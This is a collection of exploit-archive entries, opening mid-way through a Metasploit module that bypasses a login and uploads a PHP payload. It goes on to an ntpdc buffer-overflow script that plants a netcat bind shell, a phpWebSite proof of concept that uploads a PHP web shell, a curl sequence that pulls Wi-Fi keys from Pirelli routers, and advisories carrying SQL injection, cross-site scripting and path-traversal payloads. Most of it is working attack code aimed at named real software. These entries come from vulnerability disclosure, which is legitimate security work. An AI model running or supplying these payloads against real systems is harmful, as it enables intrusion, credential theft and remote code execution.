'sec' => 'gsetup',
'sec2' => 'godmode/setup/file_manager',
},
'data' => data_post
})
register_files_for_cleanup(@fname)
return res
end
def exploit
base = target_uri.path
@fname = "#{rand_text_numeric(7)}.php"
cookies = ""
# bypass authentication and get session cookie
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(base, 'index.php'),
'vars_get' => {
'loginhash_data' => '21232f297a57a5a743894a0e4a801fc3',
'loginhash_user' => 'admin',
'loginhash' => '1',
},
})
# fix if logic
if res and res.code == 200
if res.body.include?("Logout")
cookies = res.get_cookies
print_status("Login Bypass Successful")
print_status("cookie monster = " + cookies)
else
fail_with(Exploit::Failure::NotVulnerable, "Login Bypass Failed")
end
end
# upload PHP payload to images/[fname]
print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
php = %Q|<?php #{payload.encoded} ?>|
begin
res = upload(base, php, cookies)
rescue ::Rex::ConnectionError
fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
end
if res and res.code == 200
print_good("#{peer} - File uploaded successfully")
else
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
end
# retrieve and execute PHP payload
print_status("#{peer} - Executing payload (images/#{@fname})")
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(base, 'images', "#{@fname}")
}, 1)
rescue ::Rex::ConnectionError
fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
end
end
end
# Source: https://hatriot.github.io/blog/2015/01/06/ntpdc-exploit/
from os import system, environ
from struct import pack
import sys
#
# ntpdc 4.2.6p3 bof
# @dronesec
# tested on x86 Ubuntu 12.04.5 LTS
#
IMAGE_BASE = 0x80000000
LD_INITIAL_OFFSET = 8900
LD_TAIL_OFFSET = 1400
sploit = "\x41" * 485 # junk
sploit += pack("<I", IMAGE_BASE + 0x000143e0) # eip
sploit += "\x41" * 79 # junk
sploit += pack("<I", IMAGE_BASE + 0x0002678d) # location -0x14/-0x318 from shellcode
ld_pl = ""
ld_pl += pack("<I", 0xeeffffff) # ESI
ld_pl += pack("<I", 0x11366061) # EDI
ld_pl += pack("<I", 0x41414141) # EBP
ld_pl += pack("<I", IMAGE_BASE + 0x000138f2) # ADD EDI, ESI; RET
ld_pl += pack("<I", IMAGE_BASE + 0x00022073) # CALL EDI
ld_pl += pack("<I", 0xbffff60d) # payload addr based on empty env; probably wrong
environ["EGG"] = "/bin/nc -lp 5544 -e /bin/sh"
for idx in xrange(200):
for inc in xrange(200):
ld_pl = ld_pl + "\x41" * (LD_INITIAL_OFFSET + idx)
ld_pl += "\x43" * (LD_INITIAL_OFFSET + inc)
environ["LD_PRELOAD"] = ld_pl
system("echo %s | ntpdc 2>&1" % sploit)
source: https://www.securityfocus.com/bid/47780/info
Imperva SecureSphere is prone to a security-bypass vulnerability.
An attacker can leverage this vulnerability to bypass certain security restrictions. Successful exploits may allow attackers to exploit SQL-injection vulnerabilities.
15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'
<!--
# Exploit Title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload
# Date: 29-10-2014
# Software Link: https://wordpress.org/plugins/wp-easycart/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9308
# Category: webapps
1. Description
Any registered user can upload any file because of incorrect if statement inside banneruploaderscript.php
http://security.szurek.pl/wordpress-shopping-cart-304-unrestricted-file-upload.html
2. Proof of Concept
Login as regular user (created using wp-login.php?action=register):
-->
<form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="datemd5" value="1">
<input type="file" name="Filedata">
<input value="Upload!" type="submit">
</form>
<!--
File will be visible:
http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension%
3. Solution:
Update to version 3.0.9
https://downloads.wordpress.org/plugin/wp-easycart.3.0.9.zip
-->
source: https://www.securityfocus.com/bid/47772/info
Keyfax Customer Response Management is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Keyfax Customer Response Management 3.2.2.6 is vulnerable; other versions may also be affected.
http://www.example.com/keyfax32/test/response.asp?co="style%3d"x:expression(alert(1))""%20";
http://www.example.com/keyfax32/rs/main_rs.asp?C="style%3d"x:expression(alert(1))""%20";
source: https://www.securityfocus.com/bid/47767/info
GetSimple is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
GetSimple 3.0 is vulnerable; other versions may also be affected.
# ------------------------------------------------------------------------
# Software................GetSimple 3.0
# Vulnerability...........Local File Inclusion
# Threat Level............Critical (4/5)
# Download................http://get-simple.info/
# Discovery Date..........5/4/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
#
#
# --Description--
#
# A local file inclusion vulnerability in GetSimple 3.0 can be exploited
# to include arbitrary files.
#
#
# --PoC--
import socket
host = 'localhost'
path = '/getsimple_3.0'
trav_sequence = '..%2f' * 8 + 'windows%2fwin.ini'
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send('POST ' + path + '/index.php?set=' + trav_sequence + ' HTTP/1.1\r\n'
'Host: localhost\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 0\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
'\r\n')
resp = s.recv(8192)
print resp
source: https://www.securityfocus.com/bid/47770/info
HOMEPIMA Design is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
http://www.example.com/setup/filedown.php?file=../../../../../../../../../../../../../../etc/passwd
source: https://www.securityfocus.com/bid/47766/info
Perl is prone to multiple denial-of-service vulnerabilities caused by a NULL-pointer dereference.
An attacker can exploit these issues to cause an affected application to crash, denying service to legitimate users.
Perl versions 5.10.x are vulnerable.
jonathan () blackbox:~/test$ cat poc1.pl
#!/usr/bin/perl
$a =
getsockname(9505,4590,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA",17792);
jonathan () blackbox:~/test$ perl poc1.pl
Segmentation fault (core dumped)
jonathan () blackbox:~/test$
source: https://www.securityfocus.com/bid/47763/info
EmbryoCore is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
EmbryoCore 1.03 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/index.php?page=[-!Blind SQLi Here!-]
source: https://www.securityfocus.com/bid/47762/info
TCExam is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
TCExam 11.1.029 is vulnerable; other versions may also be affected.
http://www.example.com/tcexam/admin/code/tce_xml_user_results.php?lang=&user_id=1&startdate=[SQL]&enddate=[SQL]&order_field=[SQL]
- Title:
CVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N remote information disclosure
HomeStation Movistar
- Author:
Eduardo Novella @enovella_
ednolo[@]inf.upv[dot]es
- Version:
Tested on firmware version PDG_TEF_SP_4.06L.6
- Shodan dork :
+ "Dropbear 0.46 country:es" ( From now on it looks like not working on this way)
- Summary:
HomeStation movistar has deployed routers manufactured by Pirelli. These routers are vulnerable to fetch HTML code from any
IP public over the world. Neither authentication nor any protection to avoid unauthorized extraction of sensitive information.
- The vulnerability and the way to exploit it:
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_"
<option value='0'>WLAN_DEAD</option>
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey"
var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD';
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin"
var WscDevPin = '12820078';
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var sessionkey"
var sessionKey='1189641421';
$ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i "bssid:" -A 3
<td width="50">BSSID:</td>
<td>
DC:0B:1A:XX:XX:XX
</td>
# Rebooting the router remotely and provoking a Denial of Service
#-----------------------------------------------------------------
http://${IP_ADDRESS}/resetrouter.html
We can observe at the source:
<!-- hide
var sessionKey='846930886';
function btnReset() {
var loc = 'rebootinfo.cgi?';
loc += 'sessionKey=' + sessionKey;
var code = 'location="' + loc + '"';
eval(code);
}
// done hiding -->
http://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123
# All the information what we can fetch from.
#----------------------------------------------
webs$ ls
adslcfgadv.html diagpppoe.html ipv6lancfg.html qoscls.html statsatmreset.html
adslcfgc.html dlnacfg.html js qosqmgmt.html statsifc.html
adslcfg.html dnscfg.html jsps qosqueueadd.html statsifcreset.html
adslcfgtone.html dnsproxycfg.html lancfg2.html qsmain.html statsmocalanreset.html
algcfg.html dsladderr.html languages quicksetuperr.html statsmocareset.html
APIS dslbondingcfg.html lockerror.html quicksetup.html statsmocawanreset.html
atmdelerr.html enblbridge.html logconfig.html quicksetuptesterr.html statsvdsl.html
backupsettings.html enblservice.html logintro.html quicksetuptestsucc.html statsvdslreset.html
berrun.html engdebug.html logobkg.gif rebootinfo.html statswanreset.html
berstart.html ethadderr.html logoc.gif resetrouter.html statsxtmreset.html
berstop.html ethdelerr.html logo_corp.gif restoreinfo.html storageusraccadd.html
certadd.html footer.html logo.html routeadd.html stylemain.css
certcaimport.html hlpadslsync.html logomenu.gif rtdefaultcfgerr.html threeGPIN.html
certimport.html hlpatmetoe.html main.html rtdefaultcfg.html todadd.html
certloadsigned.html hlpatmseg.html menuBcm.js scdmz.html tr69cfg.html
cfgatm.html hlpethconn.html menu.html scinflt.html updatesettings.html
cfgeth.html hlppngdns.html menuTitle.js scmacflt.html upload.html
cfgl2tpac.html hlppnggw.html menuTree.js scmacpolicy.html uploadinfo.html
cfgmoca.html hlppppoasess.html mocacfg.html scoutflt.html upnpcfg.html
cfgptm.html hlppppoeauth.html multicast.html scprttrg.html url_add.html
colors.css hlppppoeconn.html natcfg2.html scripts util.js
config.json.txt hlppppoeip.html ntwksum2.html scvrtsrv.html wanadderr.html
css hlptstdns.html omcidownload.html seclogintro.html wancfg.html
ddnsadd.html hlpusbconn.html omcisystem.html snmpconfig.html wlcfgadv.html
defaultsettings.html hlpwlconn.html password.html sntpcfg.html wlcfg.html
dhcpinfo.html html portmapadd.html standby.html wlcfgkey.html
diag8021ag.html ifcdns.html portmapedit.html StaticIpAdd.html wlmacflt.html
diagbr.html ifcgateway.html portName.js StaticIpErr.html wlrefresh.html
diag.html images pppoe.html statsadslerr.html wlsecurity.html
diagipow.html index.html pradd.html statsadsl.html wlsetup.html
diaglan.html info.html ptmadderr.html statsadslreset.html wlwapias.html
diagmer.html ipoacfg.html ptmdelerr.html statsatmerr.html xdslcfg.html
diagpppoa.html ippcfg.html pwrmngt.html statsatm.html
+ Conclusion:
This vulnerability can be exploited remotely and it should be patched as soon as possible. An attacker could be monitoring our network
or even worse being a member of a botnet without knowledge of it.
First mitigation could be either try to update the last version for these routers or install 3rd parties firmwares as OpenWRT or DDWRT on them.
+ References:
http://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html
+ Timeline:
2013-04-xx Send email to Movistar and Pirelli
2015-01-05 Full disclosure
Advisory: SQL-Injection in administrative Backend of Sefrengo CMS v.1.6.0
Advisory ID: SROEADV-2015-04
Author: Steffen Rösemann
Affected Software: CMS Sefrengo v.1.6.0 (Release-Date: 18th-Feb-2014)
Vendor URL: http://www.sefrengo.org/start/start.html
Vendor Status: fixed
CVE-ID: -
==========================
Vulnerability Description:
==========================
The Content Management System Sefrengo v.1.6.0 contains SQL-Injection
vulnerabilities in its administrative Backend.
==================
Technical Details:
==================
The administrative Backend of Sefrengo CMS contains a functionality to edit
folders which reside on the CMS. Its located here:
http://{TARGET}/backend/main.php?area=con_configcat&idcat=1&idtplconf=0
The parameter „idcat“ ist vulnerable against SQL-Injection. An attacker
could abuse this to send crafted URLs to the administrator via mail to
execute own SQL commands (e.g. create a second admin-account).
Exploit-Example:
http://
{TARGET}/backend/main.php?area=con_configcat&idcat=1'+and+'1'='2'+union+select+version(),user(),3,4+--+&idtplconf=0
Another SQL-Injection vulnerability can be found in the administrative
backend, where the admin can manage installed plugins. The vulnerable
parameter is „idclient“ in the following URL:
http://{TARGET}/backend/main.php?area=plug&idclient=1
Exploit-Example:
http://
{TARGET}/backend/main.php?area=plug&idclient=1%27+and+%271%27=%272%27+union+select+1,version%28%29,user%28%29,4,database%28%29,6,7,8,9,10,11,12,13,14+--+
=========
Solution:
=========
Update to the latest version
====================
Disclosure Timeline:
====================
21-Dec-2014 –found the vulnerability
21-Dec-2014 - informed the developers
22-Dec-2014 - response by vendor
04-Jan-2015 – fix by vendor
04-Jan-2015 - release date of this security advisory
04-Jan-2015 - post on BugTraq / FullDisclosure
========
Credits:
========
Vulnerability found and advisory written by Steffen Rösemann.
===========
References:
===========
http://www.sefrengo.org/start/start.html
http://sroesemann.blogspot.de
source: https://www.securityfocus.com/bid/47759/info
phpWebSite is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
phpWebSite 1.7.1 is vulnerable; other versions may also be affected.
# ------------------------------------------------------------------------
# Software................phpWebSite 1.7.1
# Vulnerability...........Arbitrary Upload
# Threat Level............Very Critical (5/5)
# Download................http://phpwebsite.appstate.edu/
# Discovery Date..........5/5/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
#
#
# --Description--
#
# An arbitrary upload vulnerability in phpWebSite 1.7.1 can be exploited
# to upload a PHP shell.
#
#
# --PoC--
import socket
host = 'localhost'
path = '/phpwebsite_1_7_1'
shell_path = path + '/javascript/editors/fckeditor/editor/filemanager/upload/phpws/.shell'
port = 80
def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send('POST ' + path + '/javascript/editors/fckeditor/editor/filemanager/upload/phpws/upload.php?local=.htaccess HTTP/1.1\r\n'
'Host: localhost\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 223\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
'\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="NewFile"; filename=".htaccess"\r\n'
'Content-Type: application/octet-stream\r\n'
'\r\n'
'AddType application/x-httpd-php .shell\r\n'
'\r\n'
'Action application/x-httpd-php "/php/php.exe"\r\n'
'------x--\r\n'
'\r\n')
resp = s.recv(8192)
http_ok = 'HTTP/1.1 200 OK'
if http_ok not in resp[:len(http_ok)]:
print 'error uploading .htaccess'
return
else: print '.htaccess uploaded'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send('POST ' + path + '/javascript/editors/fckeditor/editor/filemanager/upload/phpws/upload.php?local=.htaccess HTTP/1.1\r\n'
'Host: localhost\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 163\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
'\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="NewFile"; filename=".shell"\r\n'
'Content-Type: application/octet-stream\r\n'
'\r\n'
'<?php system($_GET["CMD"]); ?>\r\n'
'------x--\r\n'
'\r\n')
resp = s.recv(8192)
http_ok = 'HTTP/1.1 200 OK'
if http_ok not in resp[:len(http_ok)]:
print 'error uploading shell'
return
else: print 'shell uploaded'
s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')
print 'shell located at http://' + host + shell_path
upload_shell()
# Exploit Title: SQL Injection in Microweber CMS 0.95
# Google Dork: N/A
# Date: 12/16/2014
# Exploit Author: Pham Kien Cuong (cuong.k.pham@itas.vn) and ITAS Team (www.itas.vn)
# Vendor Homepage: Microweber (https://microweber.com/)
# Software Link: https://github.com/microweber/microweber
# Version: 0.95
# Tested on: N/A
# CVE : CVE-2014-9464
::PROOF OF CONCEPT::
GET /shop/category:[SQL INJECTION HERE] HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/shop
Cookie: mw-time546209978=2015-01-05+05%3A19%3A53; PHPSESSID=48500cad98b9fa857b9d82216afe0275
Connection: keep-alive
::REFERENCE::
- http://www.itas.vn/news/itas-team-found-out-a-sql-injection-vulnerability-in-microweber-cms-69.html
- https://www.youtube.com/watch?v=SSE8Xj_-QaQ
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9464
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.
source: https://www.securityfocus.com/bid/47758/info
Gelsheet is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Gelsheet 1.02 is vulnerable; other versions may also be affected.
http://www.example.com/fengoffice/public/assets/javascript/gelSheet/index.php?id=%3Cscript%3Ealert%280%29%3C/script%3E&wid=%3Cscript%3Ealert%280%29%3C/script%3E&book=%3Cscript%3Ealert%280%29%3C/script%3E